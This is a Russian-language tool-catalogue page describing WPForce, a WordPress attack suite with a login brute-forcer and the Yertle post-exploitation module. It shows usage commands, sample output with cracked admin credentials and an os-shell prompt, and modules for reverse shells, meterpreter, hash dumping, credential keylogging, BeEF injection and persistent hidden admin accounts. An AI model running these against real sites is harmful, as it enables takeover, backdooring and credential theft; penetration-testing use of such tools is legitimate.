Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
WPForce — Wordpress Attack Suite | Kitploit
Инструменты/GitHubGitHub/n00py/wpforce
Атаки на ПаролиГенерация полезной нагрузкиЭксплуатация веб-приложенийПост-эксплуатацияТестирование на Проникновение
GitHubn00py/wpforce

WPForce

Wordpress Attack Suite

Репозиторий
9792235 лет назадПроверено Kitploit

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
Сайт

Supported Python versions

WPForce - Набор атак для Wordpress

О ПРОГРАММЕ:

WPForce — это набор инструментов для атак на Wordpress. В настоящее время включает 2 скрипта: WPForce, который осуществляет брутфорс логинов через API, и Yertle, который загружает шеллы после получения учётных данных администратора. Yertle также содержит ряд модулей для пост-эксплуатации.

Для получения дополнительной информации посетите пост в блоге по адресу: https://www.n00py.io/2017/03/squeezing-the-juice-out-of-a-compromised-wordpress-server/

Блоги на других языках:

Китайский — www.mottoin.com/100381.html

Португальский — http://www.100security.com.br/wpforce/

Испанский — http://www.1024megas.com/2017/05/wpforce-fuerzabruta-postexplotacion.html

https://esgeeks.com/como-hackear-sitio-wordpress-con-wpforce/

Русский — https://hackware.ru/?p=2547

Французский — https://securityhack3r.info/wpforce-brute-force-attack-tool-wordpress/

Турецкий — http://turkhackteam.org/web-server-guvenligi/1655005-wordpress-site-sizma-testi-part-1-a.html

ВОЗМОЖНОСТИ:

  • Брутфорс через API, а не через форму входа, что обходит некоторые виды защиты
  • Может автоматически загрузить интерактивный шелл
  • Может использоваться для запуска полноценного реверс-шелла
  • Дамп хешей паролей WordPress
  • Может бекдорить функцию аутентификации для сбора паролей в открытом виде
  • Внедрение хука BeEF на все страницы
  • Переход на meterpreter при необходимости

УСТАНОВКА:

root@kitploit:~
Yertle требует библиотеку requests для работы.
http://docs.python-requests.org/en/master/user/install/

ИСПОЛЬЗОВАНИЕ:

root@kitploit:~
python wpforce.py -i usr.txt -w pass.txt -u "http://www.[website].com"

   ,-~~-.___.       __        __ ____   _____
  / |  x     \      \ \      / /|  _ \ |  ___|___   _ __  ___  ___
 (  )        0       \ \ /\ / / | |_) || |_  / _ \ | '__|/ __|/ _ \.
  \_/-, ,----'  ____  \ V  V /  |  __/ |  _|| (_) || |  | (__|  __/
     ====      ||   \_ \_/\_/   |_|    |_|   \___/ |_|   \___|\___|
    /  \-'~;   ||     |
   /  __/~| ...||__/|-"   Инструмент брутфорса для Wordpress
 =(  _____||________|                 ~n00py~

Файл с именами пользователей: usr.txt (3)
Файл с паролями: pass.txt (21)
URL: http://www[website].com
--------------------------
[[email protected] : xxxxxxxxxxxxx] — действительные учётные данные!  - ЭТА УЧЁТНАЯ ЗАПИСЬ АДМИНИСТРАТОРА
--------------------------
--------------------------
[[email protected] : xxxxxxxxxxxx] — действительные учётные данные!
--------------------------
 100% Завершено
Все правильные пары:
{'[email protected]': 'xxxxxxxxxxxxx', '[email protected]': 'xxxxxxxxxxxxx'}

 -h, --help            показать это справочное сообщение и выйти
  -i INPUT, --input INPUT
                        Имя входного файла
  -w WORDLIST, --wordlist WORDLIST
                        Имя файла со списком слов
  -u URL, --url URL     URL цели
  -v, --verbose         Подробный вывод. Показывать попытки по мере их выполнения.
  -t THREADS, --threads THREADS
                        Определяет количество потоков, по умолчанию 10
  -a AGENT, --agent AGENT
                        Определяет User-Agent
  -d, --debug           Эта опция используется для выявления проблем со скриптом.


python yertle.py -u "[username]" -p "[password]" -t "http://www.[website].com" -i
     _..---.--.    __   __        _   _
   .'\ __|/O.__)   \ \ / /__ _ __| |_| | ___
  /__.' _/ .-'_\    \ V / _ \ '__| __| |/ _ \.
 (____.'.-_\____)    | |  __/ |  | |_| |  __/
  (_/ _)__(_ \_)\_   |_|\___|_|   \__|_|\___|
   (_..)--(.._)'--'         ~n00py~
      Модуль пост-эксплуатации для Wordpress

Бэкдор загружен!
Директория загрузки: ebwhbas
os-shell>



  -h, --help            показать это справочное сообщение и выйти
  -i, --interactive     Интерактивная командная оболочка
  -r, --reverse         Реверс-шелл
  -t TARGET, --target TARGET
                        URL цели
  -u USERNAME, --username USERNAME
                        Имя администратора
  -p PASSWORD, --password PASSWORD
                        Пароль администратора
  -li IP, --ip IP       IP слушателя
  -lp PORT, --port PORT
                        Порт слушателя
  -v, --verbose         Подробный вывод.
  -e EXISTING, --existing EXISTING
                        Пропускает загрузку шелла и подключается к существующему
                        шеллу


Yertle в настоящее время содержит следующие модули:

root@kitploit:~
Основные команды
=================

Команда                   Описание
-------                   -----------
?                         Меню помощи
beef                      Внедряет хук BeEF на сайт
dbcreds                   Выводит учётные данные базы данных
exit                      Завершить сессию
hashdump                  Дамп всех хешей паролей WordPress
help                      Меню помощи
keylogger                 Патчит ядро WordPress для записи незашифрованных учётных данных
keylog                    Отображает файл лога нажатий клавиш
meterpreter               Запускает PHP-загрузчик meterpreter для подключения к metasploit
persist                   Создаёт учётную запись администратора, которая будет восстанавливаться сама
quit                      Завершить сессию
shell                     Отправляет TCP-реверс-шелл на слушатель netcat
stealth                   Скрывает Yertle со страницы плагинов
Скачать инструмент